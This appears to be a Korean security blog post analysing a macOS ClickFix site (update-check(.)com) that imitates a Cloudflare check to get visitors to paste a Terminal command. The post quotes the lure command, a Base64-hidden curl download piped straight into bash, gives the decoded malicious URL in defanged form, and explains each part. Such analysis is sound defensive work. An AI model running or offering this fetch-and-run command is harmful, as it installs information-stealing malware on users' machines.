오늘은 macOS 환경을 노리는 ClickFix(클릭픽스) 인 update-check 은 macOS 정보 탈취 악성코드를 배포하기 위해서 제작된 클릭픽스 사이트입니다.
유포 사이트
update-check(.)com
그리고 해당 사이트에 접속하면 정상적인 Cloudflare 같이 돼 있지만 실제로는 ClickFix(클릭픽스)를 통해서 사용자의 Terminal를 실행을 하고 나서 악성코드 다운로드 및 실행을 하려고 준비된 사이트입니다.
Base64 인코딩
bash <(curl -sSfL $(echo aH???Y2suY29tL20vN2Q4ZG???5NWQ5 | base64 --decode))
입니다.
여기서 Base64를 디코딩하면 다음과 같은 결과를 확인할 수가 있습니다.
hxxps://update-check(.)com/m/7d8df2(7)d95d9
웹 소스를 보면 다음과 같이 돼 있는 것을 확인할 수가 있습니다.
<script>
const CMD = "bash <(curl -sSfL $코드 분석
원격에서 받아온 스크립트를 즉시 bash로 실행하는 코드
Base64 문자열을 디코드
디코드 결과
hxxps://update-check(.)com/m/7(d)8df(2)7d95d9
curl -sSfL (URL)
해당 URL에서 내용을 다운로드
-s:조용히 동작을 하게 설계
-S:에러는 표시
-f:HTTP 에러면 실패 처리
-L:리다이렉트 따라감
bash <( ... )
다운로드한 내용을 파일로 저장하지 않고 bash 입력으로 연결해서 실행
원격 코드 직접 실행
인터넷에서 받은 내용을 바로 실행
URL 은닉
URL을 Base64로 감싸서 한 번 숨김
리다이렉트 허용
-L 때문에 최종적으로 다른 서버로 이동
무결성 검증 없음
해시 확인, 서명 검증, GPG 검증이 전혀 존재하지 않음
이제는 윈도우 시스템에서 많이 사용을 하던 방법에서 macOS 에서도 악성코드를 감염을 통한 개인정보 유출을 노리는 악성코드들이 증가하고 있으니 macOS 에서도 백신 프로그램을 설치해서 사용하는 것을 권장합니다.
'소프트웨어 팁 > 보안 및 분석' 카테고리의 다른 글
| 김수키(Kimsuky)에서 만든 악성코드-구매 주문서 SBPL2509217 (개정 1)·pdf.js (0) | 2026.03.30 |
|---|---|
| Kimsuky(김수키) 이력서를 악용한 Rokrat 악성코드-이력서(박X민).lnk (1) | 2026.03.27 |
| 북한 김수키(Kimsuky)에서 만든 악성코드-a.js(가칭) (0) | 2026.03.23 |
| 다크소드(DarkSword) iOS 취약점이 아이폰 정보 탈취 공격 악용 (0) | 2026.03.20 |
| 김수키(Kimsuky) 대외보안 0223_주미한국대사관_비공개_정책간담회_계획안 문서로 위장한 악성코드 (0) | 2026.03.20 |
| 페덱스(FedEx) 운송 송장으로 위장을 하고 있는 피싱 메일 분석 (0) | 2026.03.19 |
| 삼성 노트북 윈도우 11 버그로 일부 노트북에서 C: 드라이브 접근 차단 (0) | 2026.03.18 |
| 김수키(Kimsuky)에서 만든 악성코드-Template.pdf.lnk (0) | 2026.03.17 |
